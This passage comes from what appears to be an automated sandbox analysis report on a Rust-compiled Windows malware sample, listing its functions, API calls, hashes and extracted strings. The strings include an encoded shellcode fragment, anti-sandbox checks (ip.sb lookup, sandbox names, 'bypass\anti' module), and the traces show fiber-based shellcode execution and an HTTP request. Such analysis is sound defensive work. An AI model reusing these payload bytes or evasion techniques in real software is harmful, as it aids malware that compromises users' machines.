7ff73a5c2fde 28337->28338 28339 7ff73a5c2e8e GetLastError 28337->28339 28340 7ff73a5c0700 19 API calls 28338->28340 28339->28342 
28343 7ff73a5c2f72 28339->28343 28340->28343 28341 7ff73a5c2fc3 28341->28330 28342->28334 28342->28335 28342->28337 28342->28343 28345 7ff73a5c30cf 28342->28345 28346 7ff73a5c9a60 8 API calls 28342->28346 28343->28341 28344 7ff73a5c2fba CloseHandle 28343->28344 28344->28341 28345->28330 28346->28342 28347 266e7a40128 HttpOpenRequestA 28348 266e7a4014f 28347->28348 28349 7ff73a5c8c3a 28350 7ff73a5c0700 19 API calls 28349->28350 28351 7ff73a5c8c97 28350->28351
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$EnvironmentExclusiveLockStrings$AcquireFreeReleasememmove
                                          • String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                          • API String ID: 91921124-3342424890
                                          • Opcode ID: da6b6af9308c99fcf1fed4def5d1a59358d9557ed4e4d659fa153940c1c744a7
                                          • Instruction ID: a5c76778d99de7e447226547f55912bdd5e3b8e86a5a6030683fbc31be93c9c0
                                          • Opcode Fuzzy Hash: da6b6af9308c99fcf1fed4def5d1a59358d9557ed4e4d659fa153940c1c744a7
                                          • Instruction Fuzzy Hash: 1F33B066A09BC198FB71AF24DC453FE67A0FB46789F805175DA8D4BB89DF389240D320

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CryptCurrentProcessRandom
                                          • String ID:
                                          • API String ID: 2610850170-0
                                          • Opcode ID: 34a0955247d83eac62b8a961388032acfd715169d666cfece63e41b4b306121d
                                          • Instruction ID: cc301ee0efd40627517614133bd18a8284f0005c8d99165fcf59a90386c16d25
                                          • Opcode Fuzzy Hash: 34a0955247d83eac62b8a961388032acfd715169d666cfece63e41b4b306121d
                                          • Instruction Fuzzy Hash: BA221336A04A9199F764AF34C8023EDBBA0FB067ACF404275EA9D47BD9DF78D1459320

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFileObjectSingleStatusWaitWrite
                                          • String ID:
                                          • API String ID: 3447438843-0
                                          • Opcode ID: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                          • Instruction ID: 36c6a8e704981293462ded8c9d538ec987b385bd9680ff4ee4947fcd768985ce
                                          • Opcode Fuzzy Hash: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                          • Instruction Fuzzy Hash: 19317436608B8196F760DB24F45136AB3A5FB85350F908135EADD43BA8DF7CD084CB10

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          • stdoutstd\src\io\mod.rsfailed to write whole buffer, xrefs: 00007FF73A59142F
                                          • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF73A591737
                                          • crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102, xrefs: 00007FF73A59161F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandleSingleTimerWaitable$AddressCreateObjectSleepWaitWakememmove
                                          • String ID: called `Result::unwrap()` on an `Err` value$crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102$stdoutstd\src\io\mod.rsfailed to write whole buffer
                                          • API String ID: 2369806718-460783922
                                          • Opcode ID: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                          • Instruction ID: 8445de7a2196c05595203e63f5d53ca3e460e835a2bacd26d81ef1701a835a6f
                                          • Opcode Fuzzy Hash: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                          • Instruction Fuzzy Hash: 0602B03AA08B56A5FB51AF21E842BE8B361FB16798F804175EE5D0B794DF3CE085D310

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 17306042-2333694755
                                          • Opcode ID: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                          • Instruction ID: eb4502dd0d5073b28e3979325394e87a9475684a028074a1bcf76663d7b413b5
                                          • Opcode Fuzzy Hash: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                          • Instruction Fuzzy Hash: DD919F3AA04B86A9F721EF25E8417E9B360FB5A798F804572EE5C03B58DF38D185D350

                                          Control-flow Graph

                                          APIs
                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000001,00000000,?,?,00000000,?,00007FF73A59130C), ref: 00007FF73A5A50A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: strlen
                                          • String ID: Failed to open file$called `Result::unwrap()` on an `Err` valuebypass\tools\src\lib.rscmd/ccalled `Option::unwrap()` on a `None` value$sandbox1$sandbox2$sandbox3$start
                                          • API String ID: 39653677-2961894791
                                          • Opcode ID: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                          • Instruction ID: ba292ad396f3473248f9ac143367f3e74be55221a8d30d44f4107244b870c514
                                          • Opcode Fuzzy Hash: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                          • Instruction Fuzzy Hash: 07E1C62AB04AC2A8FB72AF25D8027F9B360FB56798F844171DE4D07695DF38D285D320

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                          • String ID:
                                          • API String ID: 1133592946-0
                                          • Opcode ID: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                          • Instruction ID: a46ebcd158a849a34308db8838ebe9b6a95b683e429e5c4ea5085a52c0c3099b
                                          • Opcode Fuzzy Hash: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                          • Instruction Fuzzy Hash: 31314F6BA09103A5FA10BB2990573BBB651AF47784FC444F4EB6E472D7DE2CE405A370

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseCreateErrorEventHandleLast
                                          • String ID:
                                          • API String ID: 937152468-0
                                          • Opcode ID: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                          • Instruction ID: 2eea813bb104c4a94bbe4ec58e6699e58e3361fb1f7701a1b8be261c90ed6c8c
                                          • Opcode Fuzzy Hash: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                          • Instruction Fuzzy Hash: 4C81C326E08B99A9FB109B65D8813FCB760FB267A8F400571EE5C57B9CCF38D4919360

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Fiber$SwitchVirtual$AllocConvertCreateProtectThreadmemmove
                                          • String ID:
                                          • API String ID: 2990300613-0
                                          • Opcode ID: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                          • Instruction ID: 37d95589a721e11cf64156c60b462b01bba735426a3c19e89f05b74ce7663016
                                          • Opcode Fuzzy Hash: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                          • Instruction Fuzzy Hash: 0CF0466A70901151FA18BB637E1AB2AE6816F4EFC1F80C075DD0E47B90CD3CC146D710

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                          • String ID:
                                          • API String ID: 1617036312-0
                                          • Opcode ID: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                          • Instruction ID: d75559312edb36faa3888a32d1c4c6e8090991d5045be923cd850cc05448ff2e
                                          • Opcode Fuzzy Hash: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                          • Instruction Fuzzy Hash: 17610B6BA0C25662FB75A7109506B3AABD0AF47791F8441B0DEDD03AC8DE3DD944EB30

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                          • String ID: main
                                          • API String ID: 3663057573-3207122276
                                          • Opcode ID: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                          • Instruction ID: 08acc4fd6a515be3251b6a0759b2e798b60ec93d2fed0ccbb6a733b182fce5d2
                                          • Opcode Fuzzy Hash: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                          • Instruction Fuzzy Hash: 2061913AA05B42A5FB40EB24D8823BC77B0FB4A764F8481B5D95C173A0DF3CA499D360

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmovestrlen
                                          • String ID: cmd/ccalled `Option::unwrap()` on a `None` value$start
                                          • API String ID: 3405231851-2956442273
                                          • Opcode ID: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                          • Instruction ID: 7db78fd6fc1e891704e8552af3c4fdb2d50a4763acf6e7f551ea3c04a70aa9e1
                                          • Opcode Fuzzy Hash: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                          • Instruction Fuzzy Hash: D451E766B04BC1A8FB71AF25C8427E96321EB56798F808131DE4D4BA99DF38D389C310

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$memmove
                                          • String ID: called `Result::unwrap()` on an `Err` value$curlip.sbbypass\anti\src\lib.rs
                                          • API String ID: 3228343985-4197622328
                                          • Opcode ID: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                          • Instruction ID: 7d07ae5f3f5f707fc13f65973a3f141a0b3ee99a520f0fc71c13e71d506cc813
                                          • Opcode Fuzzy Hash: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                          • Instruction Fuzzy Hash: 63B19326B04BC598F722AF6998023F9A360FF56798F444331DE8D2BA55EF38D245D310

                                          APIs
                                          • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00000266E7A40143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Offset: 00000266E7A40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_266e7a40000_VKJITO.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: U.;
                                          • API String ID: 1984915467-4213443877
                                          • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                          • Instruction ID: a0018d66c09c339529525b117cd0d108d9c096fc9571a12c7edbdb92298c052c
                                          • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                          • Instruction Fuzzy Hash: 4C117C6034980D0BF65C94AE7C5AB3B11CAD7D8765F24816FB50EC32D9ED56CC83A029

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                          • Instruction ID: 953a9f78ef951b7dac59de2acd2a50df50b9b9160e7c48457e16ef942975b56b
                                          • Opcode Fuzzy Hash: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                          • Instruction Fuzzy Hash: 9341AF2A708789A1FB24AF21E081339E360EB56B94F844471DA9E47788CF3DE490D730

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorHandleInformationLast
                                          • String ID:
                                          • API String ID: 3280377019-0
                                          • Opcode ID: 7ad040db04dc6190dd0f255136d4e51e97fcf344ea4e9bd994ba41734900662d
                                          • Instruction ID: 73caa5bba0475910c3ef76bd40b850bc90163157104fd12b4617f8a6b4af6744
                                          • Opcode Fuzzy Hash: 7ad040db04dc6190dd0f255136d4e51e97fcf344ea4e9bd994ba41734900662d
                                          • Instruction Fuzzy Hash: CF31C227E18755A9F711DB61A806BEDA770BB567ADF844171EE0C12B88CF3CD186D310
                                          APIs
                                            • Part of subcall function 00007FF73A5C3F70: CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3F9C
                                            • Part of subcall function 00007FF73A5C3F70: GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FBE
                                          • CloseHandle.KERNELBASE(?,?,00000000,?,?,00007FF73A5C3AD3), ref: 00007FF73A5B29DC
                                          • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF73A5C3AD3), ref: 00007FF73A5B29E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CancelOverlappedResult
                                          • String ID:
                                          • API String ID: 3064327366-0
                                          • Opcode ID: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                          • Instruction ID: beb8d59cb5579b461dff8c5415bdbbfa8b14640550afec505c7cd774b29d9863
                                          • Opcode Fuzzy Hash: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                          • Instruction Fuzzy Hash: 1DE0302AB24A65A6F320A721E9015AC6730BB867B0F104772EE7D13BD88F34D4529710
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF73A5C8B01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                          • Instruction ID: 54a2cb011347bed7baa3987b8b159528e732b7d79443884f025d7b0ed6995dc6
                                          • Opcode Fuzzy Hash: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                          • Instruction Fuzzy Hash: 35219F76A08B8191FA219B04F54137AE360FF957D4F949230EBDD06AA8DF3CD545DB10
                                          APIs
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A5ADE05), ref: 00007FF73A5B86E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                          • Instruction ID: 2687c80fea6e855cfde8fd19a73bb3ef87643f0af801d6604f0dc2ec480833b4
                                          • Opcode Fuzzy Hash: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                          • Instruction Fuzzy Hash: BDF0F627F1871992FA11AB55A84237D9250BB06B9AF8400B2DE0C02794CF3CE1C2E220
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$FileObjectSingleWaitWrite
                                          • String ID:
                                          • API String ID: 1197516534-0
                                          • Opcode ID: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                          • Instruction ID: 1c4b429af4e87ef68812511c50b75480350750dc49cd6e85feb6f746227394c4
                                          • Opcode Fuzzy Hash: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                          • Instruction Fuzzy Hash: 57F09077F1871496F711EB65E85236EA264BB45B99F80147ADE0D13794CF3CE0C2D220
                                          APIs
                                          Memory Dump Source
